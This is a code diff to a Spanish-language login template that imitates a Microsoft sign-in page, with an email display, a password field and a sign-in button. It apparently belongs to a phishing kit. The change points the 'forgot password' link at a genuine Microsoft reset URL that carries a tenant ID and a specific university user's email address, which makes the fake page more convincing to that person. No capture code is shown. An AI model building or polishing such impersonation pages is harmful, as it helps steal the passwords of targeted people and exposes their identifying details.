--- a/Ejecutable/templates/login.html
+++ b/Ejecutable/templates/login.html
@@ -46,7 +46,11 @@
         <p><span id="email-display" class="email-display"></span></p>
         <h2>Escribir contraseña</h2>
         <input type="password" placeholder="Contraseña" />
-        <a href="#" class="forgot-password">He olvidado mi contraseña</a>
+        <a
+          href="https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2f13841d5f-968d-4624-a7da-d68a6006a84a%2freprocess%3fctx%3drQQIARAAjZHLaxNRFMZnkjbGgDYqiODCIEHUOpN7584rgS7SR1406StpMtmUOzN3OpNOMtOZjE3zB4jLCgrFpVQKWZWuRDeC4KIb605duZQsRFzVnQmlrv0WP76zOHC-88UiHIs4FjwMj5BJIgxkAUHApCVZZHiCBEaGImIgD1UIJVWAku5dj8VrNfQiAraK-1_Lt599WXgwoO-a3a7rZ1Ipq9P1cId02cD1WypL9IB1Scp02uQNTZ_S9A-aHoSSQlrUJKBiRuQIYniQNpi0ADVGMyCvy2lB5rHxLTS1lA26JjeG41l98jsUNTy82Sad7suwS3ZLbnOuKBZblXazqnCV_AparOdspV7rjn15DVrlfKW9WLVtpb_VU-orsNzfFCpW0S-2oa3nF6yljm_hugCajZKpoFVX5YQaaczaxZZjae31Ldwo2QpasYwGmBmEk-BciBnzHNqFu9BxOAmRzENdGGUSZZ3hRY5nsKRjRhdlLAIg4lG8k3Am8InHegTriX9Oxb6lsdi2E45LOpaecD3HsGyScAzDtjpkA2sa8f0vYfp0gh5O3IyG4olbVIK6fw-EM9FoLE6Np7MJ-tXkqKbja382xI_PC68PIwd3DobUyWRqtO7AVdlZM3fA7rRsmpqbteZK84FfmNv2NAEF09WeWlhFhjKDMnAvQu9FbpxEpto-ttmWz6qeszM69leEfnqJenv5P2rfj9GD2HR_3S2MPiyV872AzyKmWeeWy615UTKALhFFssSCQzbTjxcD_yhGv79CnV39NPzw5N3nw5-F4dSjulAVxOyay-e39XWrupxbNXfLEuBcIBjebF_MZXswJ2LT6oOZozj1PU79BQ2&mkt=es-PE&hosted=0&device_platform=Windows+10&username=angela.rojas%40upsjb.edu.pe"
+          class="forgot-password"
+          >He olvidado mi contraseña</a
+        >
         <a href="#" class="use-app">Use una aplicación en su lugar</a>
         <button id="login-button">Iniciar sesión</button>
       </div>
